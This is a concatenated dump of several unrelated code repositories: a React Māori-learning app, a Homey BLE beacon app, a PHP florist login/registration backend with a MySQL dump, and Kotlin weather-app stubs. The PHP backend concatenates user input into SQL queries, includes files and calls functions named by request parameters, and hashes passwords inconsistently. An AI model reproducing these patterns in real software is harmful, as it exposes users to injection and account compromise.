In order to prevent unauthorised access or disclosure we have put in place suitable physical, electronic and managerial procedures to safeguard and secure any personal information collected.</p>
<h3>Use of your information</h3>
<p className='article'>We will never sell or rent your
personal information to third parties. We will use information we collect from you for the primary purpose for which it is collected and for such other
secondary purposes that are related to the primary purpose of collection.</p>
<h3>Email Newsletters and other notices</h3>
<p className='article'>It is our policy to send only emails you elect to receive in a sign-up process. In addition, we may send out promotional material to you promoting new or amended material on our site where we
think that may be relevant to you. It is our policy to immediately remove any person from any mailing list upon the person’s request.</p>
<h3>Access and removal of Information</h3>
<p className='article'>You have the right to seek access to the personal information held about you and to advise us of any inaccuracy. There are some exceptions to this right set out in the Privacy Act. If you make an
access request, we will ask you to verify your identity and specify what information you require.</p>
<h3>Updates to our information practices</h3>
<p className='article'>We reserve the right to change this policy. By continuing to use the Website, you agree to be bound by the amended policy. You should check from time to time to see if the policy has changed.</p>
</div>
<img src='../../images/words/tohora.svg' alt='tohora - whale' className='privacy-tohora'/>
</div>
<Footer />
</div>
)
}
}
module.exports = connect(state => state)(Privacy)
<file_sep>import React from "react"
import { connect } from "react-redux"
import { Link } from "react-router"
// Needed for onTouchTap
import injectTapEventPlugin from "react-tap-event-plugin"
injectTapEventPlugin()
class Home extends React.Component {
handleClick(e) {
e.preventDefault()
this.props.router.push("/")
}
render() {
return (
<div className="container">
<div className="home-box">
<img src="./images/logo.svg" alt="logo" className="logoImage" />
<br />
<img src="./images/girl.svg" alt="girl" className="kidImage" />
<img src="./images/boy.svg" alt="boy" className="kidImage" />
<h2>
Nau mai, Haere mai <br /> Welcome
</h2>
<h3>
Kia Ora! Hi! <br /> Let's learn Te Reo Māori
</h3>
<Link to="/letters">
<button className="play">Play!</button>
</Link>
<br />
<div className="imgWrapper">
<img src="./images/words/anuhe.svg" alt="caterpillar" className="hmImage" />
<img src="./images/words/ekara.svg" alt="eagle" className="hmImage" />
<img src="./images/words/koura.svg" alt="crayfish" className="hmImage" />
</div>
</div>
</div>
)
}
}
module.exports = connect(state => state)(Home)
| f5794aac6105a0647cd613a11024478c82db32f1 | [
"JavaScript",
"Markdown"
] | 16 | JavaScript | ManuInnovations/KoreroMai2 | c05bf2efaa6bd7f3bc8b5bb9c5e49265f2871999 | ff76290afa96c78abd81630a6e27f750e79f15ad |
refs/heads/master | <file_sep># BLE Beacons
Adds support for detecting BLE beacons (iBeacons, Eddystone, etc)
## Monitor support
- [Bleacon-proxy](https://www.npmjs.com/package/bleacon-proxy)
- [happy-bubbles](https://www.happybubbles.tech/presence/)
- Homey (todo)
### TODO
- [x] iBeacons
- [x] Raspberry Pi / bleacon monitor
- [x] Beacons as devices
- [x] happy-bubbles monitor
- [x] prevent duplicate devices
- [x] bleacon ip change (manual)
- [x] Eddystone beacons
- [ ] bleacon rediscovery
- [ ] closest beacon detection
- [ ] more flow cards
- [ ] native Homey monitor
- [ ] 3D multilateration
- [ ] 3D floorplan
- [ ] raw beacons / BLE advertisements<file_sep>'use strict';
const MonitorDriver = require('../lib/MonitorDriver');
const BleaconProxyClient = require('./BleaconProxyClient');
class BleaconDriver extends MonitorDriver {
onPair( socket ) {
socket.on('list_devices', async ( data, callback ) => {
let result = [];
await this.constructor.discover((dev) => {
if(this.getDeviceByMonitorId(dev.data.id)) return;
result.push(dev);
socket.emit('list_devices', result );
});
callback(null, result);
return result;
});
}
static discoverDevToHomeyDev(dev) {
return {
name: dev.name,
settings: {
host: dev.address,
port: dev.port
},
data: {
id: dev.id
}
};
}
static async discover(enumerate) {
enumerate = enumerate || ( () => {} );
const devs = await BleaconProxyClient.discover(15000, (dev) => enumerate(this.discoverDevToHomeyDev(dev)));
return devs.map(this.discoverDevToHomeyDev);
}
}
module.exports = BleaconDriver;<file_sep>'use strict';
const {EventEmitter} = require('events');
const sConstructors = Symbol();
class Beacon extends EventEmitter {
constructor() {
super();
this._lastUpdated = new Date();
this._monitors = {};
}
get uniqueId() {
throw new Error('unimplemented');
}
getProximity(monitor) {
throw new Error('unimplemented');
}
_getMonitorData(monitor) {
return this._monitors[monitor.monitorID];
}
getRSSI(monitor) {
const monitorData = this._getMonitorData(monitor) || {};
return monitorData.rssi;
}
onJoin(monitor, first) {
this._monitors[monitor.monitorID] = {monitor};
this.emit('join', monitor, this, first);
return this._monitors[monitor.monitorID];
}
onLeave(monitor, last) {
delete this._monitors[monitor.monitorID];
this.emit('leave', monitor || this._monitor, this, last);
}
onProximityChange(monitor, monitorData) {
let now = new Date();
if(!monitorData.lastProximityChange || now - monitorData.lastProximityChange > 1000) {
monitorData.lastProximityChange = now;
monitorData.lastReportedProximity = this.getProximity(monitor);
this.emit('proximityChanged', monitor, this);
}
else if(monitorData.lastReportedProximity === this.getProximity(monitor)) {
monitorData.lastProximityChange = now;
}
}
updateData(monitor, data) {
let monitorData = this._getMonitorData(monitor);
if(!monitorData) monitorData = this.onJoin(monitor, Object.keys(this._monitors).length < 1);
monitorData.rssi = data.rssi;
this.onProximityChange(monitor, monitorData);
monitorData.lastUpdated = new Date();
}
get type() {
throw new Error('unimplemented');
}
get lastUpdated() {
return this._lastUpdated;
}
tick(now) {
Object.values(this._monitors).forEach(monitorData => {
if(now - monitorData.lastUpdated > 3000) {
this.onLeave(monitorData.monitor, Object.keys(this._monitors).length <= 1);
}
});
}
static _addType(type, name, constructor) {
this.types = this.types || {};
this[sConstructors] = this[sConstructors] || {};
this.types[type] = name;
this[sConstructors][name] = constructor;
}
static makeBeacon(type, id, data) {
if(!this[sConstructors][type]) throw new TypeError('Invalid beacon type');
return new this[sConstructors][type](id, data);
}
}
module.exports = Beacon;
Beacon._addType('IBEACON', 'iBeacon', require('./beacons/iBeacon'));
Beacon._addType('EDDYSTONE', 'Eddystone', require('./beacons/Eddystone'));<file_sep>'use strict';
const dgram = require('dgram');
const {EventEmitter} = require('events');
const net = require('net');
const readline = require('readline');
const PING_INTERVAL = 15000;
const RETRY_INTERVAL = 15000;
class BleaconProxyDriver extends EventEmitter {
constructor(port, host) {
super();
this.port = port;
this.host = host;
}
/**
* Connects to the bleacon proxy
*/
connect() {
this.disconnect();
this._client = new net.Socket();
this._client.connect(this.port, this.host, () => {
this._startPing();
this.connected = true;
this.emit('available');
});
readline.createInterface({
input: this._client
}).on('line', this._onBeacon.bind(this));
this._client.on('close', () => {
if(this.connected) {
this.disconnect();
}
setTimeout(() => this.connect(), RETRY_INTERVAL); //retry after 15 seconds
});
this._client.on('error', (err) => {
this.emit('error', err);
});
}
_startPing() {
this._stopPing();
this._pingInterval = setInterval(this.ping.bind(this), PING_INTERVAL);
}
ping() {
if(!this._client) return;
this._client.write("ping");
}
_stopPing() {
if(this._pingInterval) clearInterval(this._pingInterval);
}
disconnect() {
this._stopPing();
if(!this._client) return;
this._client.removeAllListeners();
this._client.destroy();
if(this.connected) {
this.connected = false;
this.emit('unavailable');
}
delete this._client;
}
_onBeacon(beacon) {
try {
beacon = JSON.parse(beacon);
} catch(e) { return; }
this.emit('discover_ibeacon', beacon);
}
/**
* Scans for <timeout>ms and calls enumerate whenever a new device is discovered.
* Resolves with an array of discovered devices
* @param {number} timeout - time to scan for
* @param {function} enumerate callback (gets called multiple times
*/
static async discover(timeout, enumerate) {
enumerate = enumerate || ( () => {} );
const client = dgram.createSocket('udp4');
const result = [];
client.on('listening', () => {
client.setBroadcast(true);
client.send(JSON.stringify({
type: 'bleacon-discover'
}), 1337, '255.255.255.255');
});
client.on('message', (dev, rinfo) => {
try {
dev = JSON.parse(dev);
if(dev.type === 'bleacon-discover') {
dev.address = rinfo.address;
enumerate(dev);
result.push(dev);
}
} catch(e) {
console.error(e);
}
});
client.on('error', (err) => {
console.error(err);
});
client.bind();
return new Promise((resolve) => {
setTimeout(() => {
client.close();
client.removeAllListeners();
resolve(result);
}, timeout);
});
}
}
module.exports = BleaconProxyDriver;<file_sep>'use strict';
const {Homey} = require('homey-mock');
const BleaconDriver = require('../drivers/bleacon-proxy/driver.js');
let first = true;
BleaconDriver.discover((dev) => {
if(!first) return;
first = false;
console.log(dev);
const driver = new BleaconDriver('bleacon-proxy', [dev]);
});<file_sep>'use strict';
const { EventEmitter } = require('events');
const util = require('./util');
const Beacon = require('./Beacon');
class BeaconManager extends EventEmitter {
constructor() {
super();
this._beacons = {};
setInterval(this._tick.bind(this), 3000);
}
getCurrentBeacons() {
return this._beacons;
}
async testBeacon(args, state) {
console.log(arguments);
//TODO
return true;
}
updateBeacon(type, monitor, id, data) {
if(!this._beacons[id]) this._beacons[id] = this.makeBeacon(type, monitor, id, data);
this._beacons[id].updateData(monitor, data);
}
makeBeacon(type, monitor, id, data) {
const beacon = Beacon.makeBeacon(type, id, data);
beacon.on('join', this.onBeaconJoin.bind(this));
beacon.on('proximityChanged', this.onBeaconProximityChange.bind(this));
beacon.on('leave', this.onBeaconLeave.bind(this));
return beacon;
}
onBeaconJoin(monitor, beacon, first) {
console.log('beacon join', monitor.monitorID, beacon.uniqueId, first);
//TODO: generic flow cards
this.emit('join', monitor, beacon, first);
}
onBeaconProximityChange(monitor, beacon) {
console.log('beacon proximity', monitor.monitorID, beacon.uniqueId, beacon.getProximity(monitor));
//TODO: generic flow cards
this.emit('proximityChange', monitor, beacon);
}
onBeaconLeave(monitor, beacon, last) {
console.log('beacon leave', monitor.monitorID, beacon.uniqueId, last);
//TODO: generic flow cards
this.emit('leave', monitor, beacon, last);
if(last) {
beacon.removeAllListeners();
delete this._beacons[beacon.uniqueId];
}
}
_tick() {
let now = new Date()
Object.values(this._beacons).forEach( (beacon) => beacon.tick(now) );
}
}
module.exports = new BeaconManager();<file_sep>'use strict';
const mqtt = require('async-mqtt');
const {ApiApp, manifest} = require('homey');
const {delay} = require('./util');
const MQTT_CONNECT_TIMEOUT = 7000;
class MQTTManager {
constructor() {
this._connections = {};
}
async getLocalBrokerInfo() {
try {
const brokerApi = new ApiApp('nl.scanno.mqttbroker');
if(! await brokerApi.getInstalled()) throw new Error('broker_not_installed');
const info = await brokerApi.get('/app2app/info');
info.username = manifest.id;
info.password = '<PASSWORD>'; //TODO
info.protocol = info.tls ? 'tls': 'tcp';
info.hostname = 'localhost';
await brokerApi.put('/app2app/user', {
userName: info.username,
userPassword: <PASSWORD>,
});
return info;
} catch(e) {
throw new Error('broker_not_installed');
}
}
async connectLocal() {
const info = await this.getLocalBrokerInfo();
info.rejectUnauthorized = info.hasOwnProperty('selfSigned') && !info.selfSigned;
const client = mqtt.connect(info);
client.on('error', console.log);
return new Promise((resolve, reject) => {
client.once('connect', () => resolve(client));
delay(MQTT_CONNECT_TIMEOUT).then(() => reject(new Error('timeout')));
});
}
async getConnection(id, opts) {
if(this._connections[id]) return this._connections[id];
if(id === 'local')
return this._connections[id] = this.connectLocal();
throw new Error('unimplemented');
}
}
module.exports = new MQTTManager();<file_sep>'use strict';
const BleaconProxyClient = require('./BleaconProxyClient');
const MonitorDevice = require('../lib/MonitorDevice');
const Beacon = require('../../lib/Beacon');
const util = require('../../lib/util');
class BleaconDevice extends MonitorDevice {
onInit() {
this.connect();
}
onDeleted() {
this.disconnect();
}
setAvailable() {
super.setAvailable();
this.log('Connected');
}
setUnavailable() {
super.setUnavailable();
this.log('Disconnected');
}
_onConnectionError(err) {
this.error(err.message);
}
connect() {
if(!this._client) {
this._client = new BleaconProxyClient(this.port, this.host);
this._client.on('available', this.setAvailable.bind(this));
this._client.on('unavailable', this.setUnavailable.bind(this));
this._client.on('discover_ibeacon', this._onMeasure.bind(this));
this._client.on('error', this._onConnectionError.bind(this));
}
this.log('Connecting...');
this._client.connect();
}
disconnect() {
if(!this._client) return;
this.log('Disconnecting...');
this._client.disconnect();
this._client.removeAllListeners();
delete this._client;
}
_onMeasure(beacon) {
let uniqueId = util.iBeaconUniqueId(beacon.uuid, beacon.major, beacon.minor);
this.updateBeacon(Beacon.types.IBEACON, uniqueId, beacon);
}
get host() {
return this.getSetting('host');
}
get port() {
return this.getSetting('port');
}
get monitorID() {
return this.getData().id;
}
}
module.exports = BleaconDevice;<file_sep>'use strict';
const { Driver, FlowCardTriggerDevice } = require('homey');
const BeaconManager = require('../../lib/BeaconManager');
class BeaconDriver extends Driver {
getDeviceByBeaconId(id) {
return this.getDevices().filter(dev => dev.getData().id === id).pop();
}
onInit() {
// register the card
this._beaconJoinTrigger = new FlowCardTriggerDevice('beacon_range_enter');
this._beaconJoinTrigger
.register();
// register the card
this._beaconProximityTrigger = new FlowCardTriggerDevice('beacon_range_proximity');
this._beaconProximityTrigger
.registerRunListener(async (args, state) => {
return args.monitor.monitorID === state.monitorID;
})
.register();
// register the card
this._beaconLeaveTrigger = new FlowCardTriggerDevice('beacon_range_leave');
this._beaconLeaveTrigger
.register();
BeaconManager.on('join', this.onBeaconJoin.bind(this));
BeaconManager.on('proximityChange', this.onBeaconProximityChange.bind(this));
BeaconManager.on('leave', this.onBeaconLeave.bind(this));
}
onBeaconJoin( monitor, beacon, first ) {
let device = this.getDeviceByBeaconId(beacon.uniqueId);
if(!device || !first) return; //TODO add monitor-specific card
this._beaconJoinTrigger.trigger(device);
}
onBeaconProximityChange(monitor, beacon) {
let device = this.getDeviceByBeaconId(beacon.uniqueId);
if(!device) return;
this._beaconProximityTrigger.trigger(device, {proximity: beacon.getProximity(monitor)}, {monitorID: monitor.monitorID});
}
onBeaconLeave(monitor, beacon, last) {
let device = this.getDeviceByBeaconId(beacon.uniqueId);
if(!device || !last) return; //TODO add monitor-specific card
this._beaconLeaveTrigger.trigger(device);
}
onPair( socket ) {
socket.on('list_devices', async ( data, callback ) => {
let result = [];
await this.constructor.discover((devices) => {
result = devices;
socket.emit('list_devices', result );
});
callback(null, result);
return result;
});
}
static fetchBeacons() {
const beacons = BeaconManager.getCurrentBeacons();
return Object.keys(beacons)
.map(id => { return {
name: beacons[id].type,
data: {id},
}});
}
static async discover(update) {
update = update || ( () => {} );
let result = [];
const updateBeacons = () => {
result = this.fetchBeacons()
update(result);
};
updateBeacons();
BeaconManager.on('join', updateBeacons);
BeaconManager.on('leave', updateBeacons);
return new Promise((resolve) => {
setTimeout(() => {
BeaconManager.removeListener('join', updateBeacons);
BeaconManager.removeListener('leave', updateBeacons);
resolve(result);
}, 15000); //TODO: just keep looking while the window is open
});
}
}
module.exports = BeaconDriver;<file_sep>'use strict';
const Beacon = require('../Beacon');
const util = require('../util');
class Eddystone extends Beacon {
constructor(id, {namespace, instance, measuredPower}) {
super();
this._uniqueId = id;
this._namespace = namespace;
this._instance = instance;
this._measuredPower = measuredPower;
}
get type() {
return Beacon.types.EDDYSTONE;
}
get uniqueId() {
return this._uniqueId;
}
getProximity(monitor) {
let rssi = this.getRSSI(monitor);
let accuracy = Math.pow(12.0, 1.5 * ((rssi / this.measuredPower) - 1));
if (typeof rssi === 'undefined' || accuracy < 0) {
return 'unknown';
} else if (accuracy < 0.5) {
return 'immediate';
} else if (accuracy < 4.0) {
return 'near';
} else {
return 'far';
}
}
get namespace() {
return this._namespace;
}
get instance() {
return this._instance;
}
get measuredPower() {
return this._measuredPower;
}
}
module.exports = Eddystone;<file_sep>'use strict';
const {EventEmitter} = require('events');
const {delay} = require('../../lib/util');
const MQTTManager = require('../../lib/MQTTManager');
const MQTT_TOPICS = [
'happy-bubbles/ble/{hostname}/ibeacon/+',
'happy-bubbles/ble/{hostname}/eddystone/+',
];
const MQTT_DISCOVER_TOPIC = 'happy-bubbles/ble/#';
class HappyBubblesClient extends EventEmitter {
constructor({mqttId, hostname}) {
super();
this._mqttId = mqttId;
this._hostname = hostname;
this._onMessage = this._onMessage.bind(this);
}
/**
* Connects to the bleacon proxy
*/
async connect() {
await this.disconnect();
this._client = await MQTTManager.getConnection(this._mqttId);
this._client.on('message', this._onMessage);
return await this._client.subscribe(MQTT_TOPICS.map(topic => topic.replace('{hostname}', this._hostname)));
}
async disconnect() {
if(!this._client) return;
this._client.removeListener('message', this._onMessage);
return await this._client.unsubscribe(MQTT_TOPICS.map(topic => topic.replace('{hostname}', this._hostname)));
}
_onMessage(topic, message) {
const parts = topic.split('/');
const hostname = parts[2];
if(this._hostname !== hostname) return;
const type = parts[3];
switch(type) {
case 'ibeacon':
this._onIBeacon(JSON.parse(message.toString()));
break;
case 'eddystone':
this._onEddystone(JSON.parse(message.toString()));
break;
default:
break;
}
}
_onIBeacon(beacon) {
this.emit('discover_ibeacon', beacon);
}
_onEddystone(beacon) {
this.emit('discover_eddystone', beacon);
}
/**
* Scans for <timeout>ms and calls enumerate whenever a new device is discovered.
* Resolves with an array of discovered devices
* @param {number} timeout - time to scan for
* @param {function} enumerate callback (gets called multiple times
*/
static async discover(mqttId, timeout, enumerate) {
enumerate = enumerate || ( () => {} );
const hostnames = [];
const client = await MQTTManager.getConnection(mqttId);
await client.subscribe(MQTT_DISCOVER_TOPIC);
const onMessage = (topic, message) => {
topic = topic.replace(/^happy-bubbles\/ble\//, '');
topic = topic.split('/').shift();
if(hostnames.indexOf(topic) < 0) {
hostnames.push(topic);
enumerate(topic);
}
};
client.on('message', onMessage);
await delay(timeout);
client.removeListener('message', onMessage);
await client.unsubscribe(MQTT_DISCOVER_TOPIC);
return hostnames;
}
}
module.exports = HappyBubblesClient;<file_sep>'use strict';
class Util {
static iBeaconUniqueId(uuid, major, minor) {
return ['ibeacon', uuid.replace('-','').trim(), major, minor].join('-').toLowerCase();
}
static eddystoneUniqueId(uuid, major, minor) {
//TODO
return ['eddystone', uuid.replace('-','').trim(), major, minor].join('-').toLowerCase();
}
static async delay(timeout) {
return new Promise((resolve) => {
setTimeout(resolve, timeout);
});
}
}
module.exports = Util;<file_sep>'use strict';
const {Driver} = require('homey');
class MonitorDriver extends Driver {
getDeviceByMonitorId(id) {
return this.getDevices().filter(dev => dev.monitorID === id).pop();
}
}
module.exports = MonitorDriver;<file_sep>'use strict';
const Homey = require('homey');
const BeaconManager = require('./lib/BeaconManager');
class BLEBeaconApp extends Homey.App {
onInit() {
this.log('BLEBeaconApp is running...');
}
}
module.exports = BLEBeaconApp; | b00a17f7c019aef4af12eb77b2e056d7c0ad1260 | [
"Markdown",
"JavaScript"
] | 14 | Markdown | Dijker/nl.vollenbrock.beacons | 614ab580e1bab4f3e3256c3755ba1fb60169d18b | 22d9ae5e0cf45704a3d9c4acebe5805af8c3b579 |
refs/heads/master | <repo_name>ddloo/flowers<file_sep>/php/Link/LoginUser.php
<?php
include_once('LinkSql.php');
class LoginUser extends LinkSql{
//连接数据库
public function __construct()
{
parent::__construct();
}
//判断用户名是否存在
public function usernameIsExist($username){
$result = $this->query('select `username` from `user` where `username` = "'.$username.'"');
if($result->num_rows === 0){
//用户不存在
return 0;
}
return 1;
}
//判断邮箱是否存在
public function emailIsExist($email){
$result = $this->query('select `email` from `user` where `email` = "'.$email.'"');
if($result->num_rows === 0){
//用户不存在
return 0;
}
return 1;
}
//判断用户输入账号密码是否错误
public function auth($keyword, $password, $isUsername){
$userExist = NULL;
$type = NULL;
// die(var_dump($isUsername));
if($isUsername === "true"){
$userExist = $this->usernameIsExist($keyword);
if($userExist === 0){
//用户名不存在
return 0;
}
$type = 'username';
}
else{
$userExist = $this->emailIsExist($keyword);
if($userExist === 0){
//邮箱不存在
return 1;
}
$type = 'email';
}
$result = $this->query('select * from `user` where `password` = "'.$password.'" and `'.$type.'` = "'.$keyword.'"');
//查询错误
if(!$result){
return 2;
}
else if($result->num_rows !== 0){
$userMessage = $result->fetch_assoc();
return $userMessage;
}
//账号或者密码错误
return 3;
}
}<file_sep>/php/Link/RegisterUser.php
<?php
include_once('LinkSql.php');
class RegisterUser extends LinkSql{
//连接数据库
public function __construct()
{
parent::__construct();
}
//判断用户是否已被注册
public function usernameIsExist($username){
$result = $this->query('select `username` from `user` where `username` = "'.$username.'"');
if($result->num_rows === 0){
//用户不存在
return 0;
}
return 1;
}
//判断邮箱是否已被注册
public function emailIsExist($email){
$result = $this->query('select `email` from `user` where `email` = "'.$email.'"');
if($result->num_rows === 0){
//用户不存在
return 0;
}
return 1;
}
//用户注册
public function registerUser($username, $email, $password){
$isUsername = $this->usernameIsExist($username);
$isEmail = $this->emailIsExist($email);
if ($isUsername === 0 && $isEmail === 0){
$password = md5($password);
$userRegister = $this->query('insert into `user` (`username` , `password`, `email`)
values ("'.$username.'", "'.$password.'","'.$email.'")');
return 0;
}
else if($isUsername === 1){
//用户名已经存在
return 1;
}
else if($isEmail === 1){
//邮箱已经存在
return 2;
}
}
}
<file_sep>/php/Handle/UserHandle.php
<?php
//用户登录
function auth(){
$response = [];
if(!isset($_POST['keyword'], $_POST['password'], $_POST['isUsername'])){
$response = [
'code' => '1000',
'msg' => '发生了某些未知错误,请联系网站管理员┭┮﹏┭┮'
];
die(json_encode($response));
}
include_once (app::$base."/Link/LoginUser.php");
$login = new LoginUser();
//登录操作
$result = $login->auth($_POST['keyword'], $_POST['password'], $_POST['isUsername']);
// die($result);
if($result === 0){
//用户不存在
$response = [
'code' => '0001',
'msg' => '该用户名不存在呢o_o ...'
];
die(json_encode($response));
}
else if($result === 1){
//用户不存在
$response = [
'code' => '0001',
'msg' => '该邮箱不存在呢o_o ...'
];
die(json_encode($response));
}
else if($result === 2){
//服务器可能发生错误
$response = [
'code' => '2000',
'msg' => '发生了未知错误,请联系网站管理员QAQ'
];
die(json_encode($response));
}
else if($result === 3){
//账号或者密码错误
$response = [
'code' => '0002',
'msg' => '账号或者密码错误的话>﹏<'
];
die(json_encode($response));
}
else{
//登录成功
session_start();
$_SESSION['uid'] = $result['uid'];
setcookie('uid', $_SESSION['uid'], time() + 60 * 60 * 24 * 1, '/');
$response = [
'code' => '0000',
'msg' => '登录成功',
'data' => [
'username' => $result['username'],
'uid' => $result['uid']
]
];
die(json_encode($response));
}
}
//用户注册
function register(){
$response = [];
if(!isset($_POST['username'], $_POST['password'], $_POST['email'])){
$response = [
'code' => '1000',
'msg' => '发生了某些不可告人的错误呢┭┮﹏┭┮'
];
die(json_encode($response));
}
include_once(app::$base.'/Link/RegisterUser.php');
$register = new RegisterUser();
//注册操作
$result = $register->registerUser($_POST['username'], $_POST['email'], $_POST['password']);
if($result === 1){
//用户名已经被注册
$response = [
"code" => "0001",
"msg" => "该用户名已经被注册啦::>_<::"
];
die(json_encode($response));
}
else if($result === 2){
//邮箱已经被注册
$response = [
"code" => "0002",
"msg" => "该邮箱已经被注册啦::>_<::"
];
die(json_encode($response));
}
else{
//注册成功
$response = [
"code" => "0000",
"msg" => "注册成功^o^"
];
die(json_encode($response));
}
}<file_sep>/php/Link/LinkSql.php
<?php
//封装连接数据库类
class LinkSql extends mysqli{
private $host = "";
private $port = "";
private $db = "";
private $admin = "";
private $password = "";
public $isLinkSql = false;
public function __construct(){
$this->host = app::$host;
$this->port = app::$port;
$this->db = app::$db;
$this->admin = app::$admin;
$this->password = app::$<PASSWORD>;
parent::__construct($this->host, $this->admin, $this->password, $this->db, $this->port);
if(!$this->connect_error){
$this->set_charset("utf8");
$this->isLinkSql = true;
}
}
}<file_sep>/florist.sql
-- phpMyAdmin SQL Dump
-- version 4.8.5
-- https://www.phpmyadmin.net/
--
-- 主机: 127.0.0.1
-- 生成日期: 2019-11-11 00:14:53
-- 服务器版本: 10.1.38-MariaDB
-- PHP 版本: 7.3.3
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET AUTOCOMMIT = 0;
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- 数据库: `florist`
--
-- --------------------------------------------------------
--
-- 表的结构 `user`
--
CREATE TABLE `user` (
`uid` int(11) NOT NULL,
`username` varchar(50) NOT NULL,
`password` varchar(30) NOT NULL,
`email` varchar(50) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
--
-- 转存表中的数据 `user`
--
INSERT INTO `user` (`uid`, `username`, `password`, `email`) VALUES
(1, 'ddloo', '<PASSWORD>', '<PASSWORD> <EMAIL>'),
(2, '444', '<PASSWORD>', '<EMAIL>');
--
-- 转储表的索引
--
--
-- 表的索引 `user`
--
ALTER TABLE `user`
ADD PRIMARY KEY (`uid`);
--
-- 在导出的表使用AUTO_INCREMENT
--
--
-- 使用表AUTO_INCREMENT `user`
--
ALTER TABLE `user`
MODIFY `uid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
COMMIT;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep>/php/entrance.php
<?php
//入口文件
class app{
public static $host = "localhost";
public static $port = "3306";
public static $db = "florist";
public static $admin = "root";
public static $password = "";
public static $base = __DIR__;
}
$handle = $_GET['handle'];
$method = $_GET['method'];
include_once(app::$base."/Handle/".$handle.".php");
$method(); | 192cc8d2d9bf97f3b2ce3b835f1edf092172a22b | [
"SQL",
"PHP"
] | 6 | PHP | ddloo/flowers | 7c716d418e4975c7a5f8fd181edab5f6ea4cfdf6 | ea7dea9a8b53e9be5b2f4ad68692a93cc052ca3c |
refs/heads/master | <repo_name>kalug89/NewWeatherApp<file_sep>/app/src/main/java/com/dkaluzny/newweatherapp/ui/details/DetailsFragment.kt
package com.dkaluzny.newweatherapp.ui.details
import android.os.Bundle
import android.util.Log
import android.view.LayoutInflater
import android.view.View
import android.view.ViewGroup
import androidx.fragment.app.Fragment
import androidx.lifecycle.ViewModelProviders
import kotlinx.android.synthetic.main.details_fragment.*
class DetailsFragment : Fragment() {
}
<file_sep>/settings.gradle
include ':app'
rootProject.name='NewWeatherApp'
<file_sep>/app/src/main/java/com/dkaluzny/newweatherapp/ui/details/DetailsViewModel.kt
package com.dkaluzny.newweatherapp.ui.details
import androidx.lifecycle.ViewModel
class DetailsViewModel: ViewModel(){
}<file_sep>/app/src/main/java/com/dkaluzny/newweatherapp/ui/dashboard/DashboardFragment.kt
package com.dkaluzny.newweatherapp.ui.dashboard
import android.os.Bundle
import android.view.LayoutInflater
import android.view.View
import android.view.ViewGroup
import androidx.fragment.app.Fragment
import com.dkaluzny.newweatherapp.R
class DashboardFragment : Fragment() {
private lateinit var viewModel: DashboardViewModel
override fun onCreateView(
inflater: LayoutInflater,
container: ViewGroup?,
savedInstanceState: Bundle?
): View? {
return inflater.inflate(
R.layout.dashboard_fragment, container, false
)
}
}
<file_sep>/app/src/main/java/com/dkaluzny/newweatherapp/ui/dashboard/DashboardViewModel.kt
package com.dkaluzny.newweatherapp.ui.dashboard
import androidx.lifecycle.ViewModel
class DashboardViewModel : ViewModel()<file_sep>/app/src/main/java/com/dkaluzny/newweatherapp/ui/error/ErrorViewModel.kt
package com.dkaluzny.newweatherapp.ui.error
import androidx.lifecycle.ViewModel
class ErrorViewModel: ViewModel(){
}<file_sep>/app/src/main/java/com/dkaluzny/newweatherapp/ui/error/ErrorFragment.kt
package com.dkaluzny.newweatherapp.ui.error
import android.os.Bundle
import android.view.LayoutInflater
import android.view.View
import android.view.ViewGroup
import androidx.fragment.app.Fragment
import androidx.lifecycle.ViewModelProviders
import kotlinx.android.synthetic.main.error_fragment.*
class ErrorFragment : Fragment() {
}
<file_sep>/app/src/main/java/com/dkaluzny/newweatherapp/ui/MainActivity.kt
package com.dkaluzny.newweatherapp.ui
import android.os.Bundle
import androidx.appcompat.app.AppCompatActivity
import com.dkaluzny.newweatherapp.R
import com.dkaluzny.newweatherapp.ui.dashboard.DashboardFragment
class MainActivity : AppCompatActivity() {
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContentView(R.layout.activity_main)
if (savedInstanceState == null) {
supportFragmentManager.beginTransaction().replace(R.id.root, DashboardFragment()
).commit()
}
}
}
/*
Zadanie polega na stworzeniu prostej aplikacji do sprawdzania prognozy pogody z wykorzystaniem darmowej usługi np.
http://apidev.accuweather.com/developers/ lub http://openweathermap.org/api lub dowolnej innej, wybranej przez kandydata, która udostępnia publiczne API.
Wymagania funkcjonalne:
● na pierwszym widoku można podać miasto dla którego chce się wyszukać prognozę pogody (google places API, SDK Android (validacja miasta))
● po pobraniu prognozy pogody dla podanego miasta ma nastąpić nawigacja do nowego widoku ze szczegółami prognozy,
● ilość szczegółów prognozy pogody na ekranie szczegółowym jest dowolna. Może być np. temperatura aktualna, stan zachmurzenia, możliwość opadów, tabelka z temperaturami na najbliższe godziny itd. w zależności co uda się pobrać z usługi,
● kolor czcionki temperatury ma różnić się w zależności od stopni -> poniżej 10 stopni kolor niebieski, między 10 a 20 stopni kolor czarny, powyżej 20 kolor czerwony.
Notatki.
- Do pobierania API - retrofit
*/
/*Notatki:
https://csform.com/product/matta-material-ui-kit/
https://lh3.googleusercontent.com/N2wLODwPww0RRlNQqvrmAS0pN4B64Dwai5_1txGAnEtvnhi2qyASsbsiNKbv-cIuWQ
*/ | 168afd7ddc6b80439cf44108c9631c6e73ace643 | [
"Kotlin",
"Gradle"
] | 8 | Kotlin | kalug89/NewWeatherApp | 38b44340b6d99e8e6f908a17a0c68ea784325155 | 61155585725cfebeb1dd56563dadd14bb4e2e9c0 |
refs/heads/master | <file_sep><?php
namespace AppBundle\Class;
<file_sep><?php
use Doctrine\ORM\Mapping\ClassMetadataInfo;
$metadata->setInheritanceType(ClassMetadataInfo::INHERITANCE_TYPE_NONE);
$metadata->setPrimaryTable(array(
'name' => 'Lesson',
));
$metadata->setChangeTrackingPolicy(ClassMetadataInfo::CHANGETRACKING_DEFERRED_IMPLICIT);
